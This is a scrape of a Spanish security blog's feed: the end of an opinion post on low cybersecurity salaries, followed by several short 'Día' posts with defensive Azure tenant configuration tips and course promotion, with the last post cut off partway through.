Mercadona, con todos mis respetos, cobra más que un tipo con responsabilidades en una empresa.</p><p>La burbuja, la crisis, los cambios, todo esto es nuestra culpa. En primer lugar porque aceptamos los precios, aceptamos los cacahuetes. Yo lo veo a diario en mi entorno. No en el salarial-laboral, sino en los servicios. Las empresas intentan comprar barato, pero porque siempre hay quien vende barato...</p><p>Quien soy yo para decirle a alguien que vender con un margen del 5% es una locura. Porque a lo mejor ese tipo tiene mas potencia de venta, y puede ganar mucho más que yo con mi 10%... por decir algo. Cada uno es libre, pero la tendencia es que el sistema gana, al final siempre aparecen servicios low cost que enmascaran los buenos, y estos nos perjudica a TODOS. Porque tu compras una auditoria barata, contratas a un técnico barato, compras material barato, y vendes servicios peores y más baratos... y luego llegará una IA y te quitará de enmedio.</p><p>Hablo con empresas que no se permiten invertir en formación en sus trabajadores. Recuerdo donde trabajé 10 años en Murcia en un hospital, que NUNCA me negaron un curso, un viaje a Madrid a un evento. NUNCA. Es más mi jefe que era Médico, entendía que yo, estaba dispuesto a quitarle tiempo a mi vida particular por formarme, para que eso revertiera en la empresa... Yo ahora alucino.</p><p>De verdad, decirme, 500 / 700 /1000 euros hoy en día, para una empresa es algo? si eso supone un freno, la empresa VA MAL.</p><p>El 50% de los cursos que vendo, son los trabajadores los que lo pagan. Porque quieren mejorar de condiciones, porque están hasta la po**** de cobrar esos 18k/25k al mes...</p><p>Vamos a las conferencias y nos reimos, el que no cobra 80k es un tolay... ya ya... me gustaría saber cuanto cobran la mayoría de mis lectores, de vosotros. Porque cuando hablo en confianza con amigos, MUCHOS, la MAYORÍA no cobran esas cifras. Y tengo amigos que cobran 120k, 150k, 90k pero la mayoría NO, la mayoría tiene sueldos de mierda, para el esfuerzo que requiere mantenerse al día en la ciberseguridad.</p><p>Y claro, seguro que alguno trabaja en un vendor internacional, o en una gran empresa, y me dirá que no es así, que los sueldos son altos... pero la mayoría de las personas no trabajan en esas empresas, y cobran miseria. </p><p>La gente con la que yo aprendí ciberseguridad, eran expertos en sistemas operativos, redes, programación, comunicaciones, hablo de autenticos expertos. Gente que lleva 20 años dándole duro. Pero la realidad es que el mercado es tan grande, que contrata a gente del FP, sin experiencia, por cuatro duros. Claro, volvemos a lo de siempre. No tienes experiencia, no cobras. Pero en su momento yo opté por formarme. Hoy en día se ha establecido el binomio junior-oscp-25k y para empresas de pentesting nacionales, se los rifan, porque son productivos, y les pagan poco. Les pagan poco para lo que cobran esas empresas. Pero y si no eres pentester? o qué pasa después del oscp? como salto a 40k? a 60k? COMPLICADO. Ya la mayoría abandona Ubuntu y se pasan al Excel. Abandonan la shell y se pasan a Jira.</p><p>Creo que al final, ese sentimiento que muchos movíamos, de pagar a los profesionales. Ya sabes a quien me refiero. Estos que decimos que no hay necesidad de miles de expertos en ciber, sino necesidad de que se les pague y valore... al final, creo que estamos perdiendo. Y vuelvo a lo mismo, la culpa es nuestra y de la industria. De todos, porque todos somos parte.</p><p>Yo se salir de la burbuja. He pasado por encontrar trabajo siendo un crío de barrio sin estudios, cambios de dueños, jefes, compañías, negocios, modalidades, y SOLO he encontrado una manera de hacerlo, y SIEMPRE ha sido formándome. Estudiando. Certificándome, Creciendo. SOLO así he resistido 23 años en el mundo laboral de la informática, con más o menos suerte.</p><p>Lo digo porque aunque he llamado esto rotura de la crisis, hay una parte que cada uno podemos hacer, no podemos cambiar a la industria, es muy complicado, pero si a nosotros mismos, y ponérselo más dificil, para que no te pisen.</p><p>Tu qué opinas? cobras 80k al año? crees que cada vez hay más trabajo en ciber de calidad?</p><p>Gracias por leerme !!!</p>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-43885067938172693482024-01-24T09:06:00.002+01:002024-01-24T09:06:40.293+01:00Día 14: Revisa la configuración de tu Azure !!!<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-7-revisa-la-configuracion-de-tu.html" target="_blank">Día 7</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-8-revisa-configuracion-de-tu-azure.html" target="_blank">Día 8</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-9-revisa-la-configuracion-de-tu.html" target="_blank">Día 9</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-10-revisa-la-configuracion-de-tu.html" target="_blank">Día 1</a>0, <a href="https://kinomakino.blogspot.com/2024/01/dia-11-revisa-configuracion-de-tu-azure.html" target="_blank">Día 11</a> , <a href="https://kinomakino.blogspot.com/2024/01/dia-12-revisa-la-configuracion-de-tu.html" target="_blank">Día 12</a> </p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><h2><span style="color: red; font-size: medium;"><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Quieres acceder a algunas lecciones gratuitas del curso para verlo?<br /></span></b><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Aquí las tienes:</span></b></span><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"> https://buff.ly/3vEEQQz</a></h2><h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEm0wmwVhhyphenhyphen8kuvUhmRtpiO8S1WntcT9G5V8ibLOakVe_KlXNDrEZnfDg-3qJUNs_GHHltHMwvO6Lx9KLJuP7JeyO8IpOU2-V_73J_F5hSXFEj-oPLp_JbT19jS-3wZh14ZJU-lsGWoruGJbGpy5GU3FdCSVD39J6AschuQ1zeNvYQ6FsFbTcMr8rS9R4w/s1200/formacion.seguridadsi.com%2014.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEm0wmwVhhyphenhyphen8kuvUhmRtpiO8S1WntcT9G5V8ibLOakVe_KlXNDrEZnfDg-3qJUNs_GHHltHMwvO6Lx9KLJuP7JeyO8IpOU2-V_73J_F5hSXFEj-oPLp_JbT19jS-3wZh14ZJU-lsGWoruGJbGpy5GU3FdCSVD39J6AschuQ1zeNvYQ6FsFbTcMr8rS9R4w/w640-h334/formacion.seguridadsi.com%2014.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></h2><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 14</b></h4><div>Ubicaciones por nombre, <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/SecurityMenuBlade/~/NamedLocations" target="_blank">check aquí</a>. Es importante configurar un pool de direcciones, por ejemplo de confianza, nuestro entorno público, o un pool de direcciones TOR, o un país... Al final tener configurado esto, nos puede ayudar posteriormente a aplicar directivas de acceso condicional, por ejemplo, dejarte entrar o no a un recurso, perdirte un MFA + algo si estás en un sitio concreto, o no pedírtelo... Conocer estas capacidades es importante, no sólo por la seguridad, sino por adaptar nuestros procesos de negocio a nuestros empleados. Por ejemplo, en una ubicación de confianza, quizás el MFA pueda ser más relajado... y así nuestros usuarios seguirán invitándonos a café. Por supuesto, revisar si tienes alguna configuración, por si alguien te la ha jugado y lo está usando como persistencia.</div><div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-81293278011647864792024-01-23T09:07:00.003+01:002024-01-23T09:07:30.175+01:00Día 13: Revisa la configuración tu Azure !!!<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-7-revisa-la-configuracion-de-tu.html" target="_blank">Día 7</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-8-revisa-configuracion-de-tu-azure.html" target="_blank">Día 8</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-9-revisa-la-configuracion-de-tu.html" target="_blank">Día 9</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-10-revisa-la-configuracion-de-tu.html" target="_blank">Día 1</a>0, <a href="https://kinomakino.blogspot.com/2024/01/dia-11-revisa-configuracion-de-tu-azure.html" target="_blank">Día 11</a> , <a href="https://kinomakino.blogspot.com/2024/01/dia-12-revisa-la-configuracion-de-tu.html" target="_blank">Día 12</a> </p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><h2><span style="color: red; font-size: medium;"><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Quieres acceder a algunas lecciones gratuitas del curso para verlo?<br /></span></b><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Aquí las tienes:</span></b></span><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"> https://buff.ly/3vEEQQz</a></h2><h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQYO81CwNf-1KnLeE6rGn-ASL5N4TmxGlFhUfVdPWD1UolxdKuJ_m16W2-B0z_y-Z9umKp6nXRBeGQZbSlbrmomdE9I6PTCmVO-Y486EL1SUG2jR7iTel5ZjkAnHys-ppu7diDNmRp3BqB7L6y8T0bJNahmDlNBBC4SVd6x-_QFHT7Nelww6EqtDr-2eXP/s1200/formacion.seguridadsi.com%2013.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQYO81CwNf-1KnLeE6rGn-ASL5N4TmxGlFhUfVdPWD1UolxdKuJ_m16W2-B0z_y-Z9umKp6nXRBeGQZbSlbrmomdE9I6PTCmVO-Y486EL1SUG2jR7iTel5ZjkAnHys-ppu7diDNmRp3BqB7L6y8T0bJNahmDlNBBC4SVd6x-_QFHT7Nelww6EqtDr-2eXP/w640-h334/formacion.seguridadsi.com%2013.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></h2><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 13</b></h4><div><i>Si estamos hablando de seguridad, no deberías dejar de pasarte por la opción Seguridad xD. El security center nos da unas recomendaciones sencillas para fortificar el entorno, personalizadas, en tu idioma, y de muy fácil configuración. Sólo tienes que <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/SecurityMenuBlade/~/SecurityCenter" target="_blank">entrar aquí</a>, y repasar sus consejos. Este post es sencillo xD</i></div><div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-23988109449336648132024-01-22T11:11:00.000+01:002024-01-22T11:11:12.798+01:00Día 12: Revisa la configuración de tu Azure<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-7-revisa-la-configuracion-de-tu.html" target="_blank">Día 7</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-8-revisa-configuracion-de-tu-azure.html" target="_blank">Día 8</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-9-revisa-la-configuracion-de-tu.html" target="_blank">Día 9</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-10-revisa-la-configuracion-de-tu.html" target="_blank">Día 1</a>0, <a href="https://kinomakino.blogspot.com/2024/01/dia-11-revisa-configuracion-de-tu-azure.html" target="_blank">Día 11</a></p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><h2><span style="color: red; font-size: medium;"><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Quieres acceder a algunas lecciones gratuitas del curso para verlo?<br /></span></b><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Aquí las tienes:</span></b></span><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"> https://buff.ly/3vEEQQz</a></h2><h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilhBTbcLJ72mKPiTlWRlwEdGbgLsOImX1q9CzRGqJInafK3zQ_bQqw0sVKBnKvmfBypr66FcUE9YN4TNUCphPIvqgCWGxe6V4wtzVVf-MlL8sm0OaIJg8i8oeACJFethYOMugDybfDjTx39y44QWTmylQ2h6i73mUHqQTKAPRNr-tYZLVF6f-hFp5j9WVs/s1200/formacion.seguridadsi.com%2012%20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilhBTbcLJ72mKPiTlWRlwEdGbgLsOImX1q9CzRGqJInafK3zQ_bQqw0sVKBnKvmfBypr66FcUE9YN4TNUCphPIvqgCWGxe6V4wtzVVf-MlL8sm0OaIJg8i8oeACJFethYOMugDybfDjTx39y44QWTmylQ2h6i73mUHqQTKAPRNr-tYZLVF6f-hFp5j9WVs/w640-h334/formacion.seguridadsi.com%2012%20.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></h2><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 12</b></h4><div><i>En el anterior post hablábamos del reset de contraseñas. Ahora vamos a la notificación de estas. Tenemos dos comportamientos a configurar. Que le llegue al usuario un correo, y que le llegue a un admin, cuando otro admin lo haya hecho. Sin duda, dos opciones indispensables. Por qué no las activas ya!?????</i></div><div><i><br /></i></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH3YWaAvxxgV-8XAEDT1lXLrzNlpOdoT9EwjtK3kVBHhldCCSY6tPTRH3XAEPIEcnpT20QcCW_UO_yL-qoij7LnnAWvHhm_DteCY3o0q1K8p5jyfw24_qQk3Y0hyphenhyphenE-mwU4M0iUnSGGc7fO4iR45Nj_FApE1RBjdEyEma3oT-nF-TwHgNelktpdqfJn-Hu0/s1264/Captura%20de%20pantalla%202024-01-22%20a%20las%2011.00.14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="482" data-original-width="1264" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH3YWaAvxxgV-8XAEDT1lXLrzNlpOdoT9EwjtK3kVBHhldCCSY6tPTRH3XAEPIEcnpT20QcCW_UO_yL-qoij7LnnAWvHhm_DteCY3o0q1K8p5jyfw24_qQk3Y0hyphenhyphenE-mwU4M0iUnSGGc7fO4iR45Nj_FApE1RBjdEyEma3oT-nF-TwHgNelktpdqfJn-Hu0/w640-h244/Captura%20de%20pantalla%202024-01-22%20a%20las%2011.00.14.png" width="640" /></a></div></div><div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-13338035521913039252024-01-19T08:30:00.003+01:002024-01-19T08:30:51.610+01:00Día 11: Revisa configuración de tu Azure !!!<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-7-revisa-la-configuracion-de-tu.html" target="_blank">Día 7</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-8-revisa-configuracion-de-tu-azure.html" target="_blank">Día 8</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-9-revisa-la-configuracion-de-tu.html" target="_blank">Día 9</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-10-revisa-la-configuracion-de-tu.html" target="_blank">Día 10</a></p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><h2><span style="color: red; font-size: medium;"><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Quieres acceder a algunas lecciones gratuitas del curso para verlo?<br /></span></b><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Aquí las tienes:</span></b></span><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"> https://buff.ly/3vEEQQz</a></h2><h2><br /><div class="separator" style="clear: both; text-align: center;"><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); 